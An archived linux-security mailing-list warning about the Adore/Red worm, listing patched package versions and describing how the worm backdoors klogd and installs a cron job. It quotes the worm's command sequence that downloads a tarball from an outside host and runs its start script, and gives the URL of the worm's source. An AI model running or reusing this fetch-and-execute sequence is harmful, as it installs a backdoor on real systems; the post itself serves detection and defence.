[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[linux-security] RedWorm warning



Topic
=====
Warning about RedWorm.

Probelm Description
===================
This is not an advisory about a new vulnerability. Hence, if your system is
patched against the most common remote root exploits on Linux, particularly
rpc.statd, bind, LPRng, and wu-ftpd. Your system should have the following
versions installed (this is for RedHat; please check your own distribution
for the newest version):

# rpm -q nfs-utils
nfs-utils-0.1.9.1-x     (x can be 1 or 7)
# rpm -q bind
bind-8.2.2_P7-x         (x can be 0.6.2 or 1)
# rpm -q LPRng
LPRng-x                 with x at least 3.6.24
# rpm -q wu-ftpd
wu-ftpd-2.6.x           with x either 0-14.6x or 1-6

(if you get the response "package not installed", that's fine too)

Note, that advisories about each of these have appeared on this list, hence
you should not (must not!) be vulnerable against any of these bugs. If you
are vulnerable, you just earned the right to have your internet connection
terminated. Please, email me your IP address so that we can do so.

Note, that we are currently receiving several portscans every week across
the whole 142.58.0.0 network looking for these kind of vulnerabilities.

Information on the RedWorm
==========================
Adore/Red attacks vulnerabilities in rpc.statd, bind, LPRng, and
wuftpd26.  All compromised systems we've seen so far have been RedHat 7.
A successful attack down loads and executes a copy of itself via the
following command sequence.

  TERM="linux"
  export PATH="/sbin:/usr/sbin:/bin:/usr/bin:/usr/local/bin"
  lynx -dump http://go.163.com/~hotcn/red.tar >/usr/lib/red.tar
  [ -f /usr/lib/red.tar ] || exit 0
  cd /usr/lib;tar -xvf red.tar;rm -rf red.tar;cd lib;./start.sh

Red Worm replaces klogd with it's own backdoor.  It also puts the original
klogd in /usr/lib/klogd.o.  I would run strings on /sbin/klogd.  If it
includes the strings /bin/sh or icmp, then it is the backdoor.
The trojan'd klogd is compiled and set running on port 65535 waiting
for an incoming packet with a data size of 77 bytes.

The results of the scans are e-mailed to two addresses in the PRC.

  adore9000@21cn.com
  adore9000@sina.com

One of the new twists on this worm is that it installs its own
version of /etc/cron.daily/0anacron, the root cron process that
will get executed once a day.  The first time the daily cron
process runs after Adore is installed will replace all trojan'd
files with the originals and delete the worms install directory,
/usr/lib/lib.

Source for RedWorm can be found at:

        http://go.163.com/~hotcn/red.tar

This should help in tracking down other methods of identification.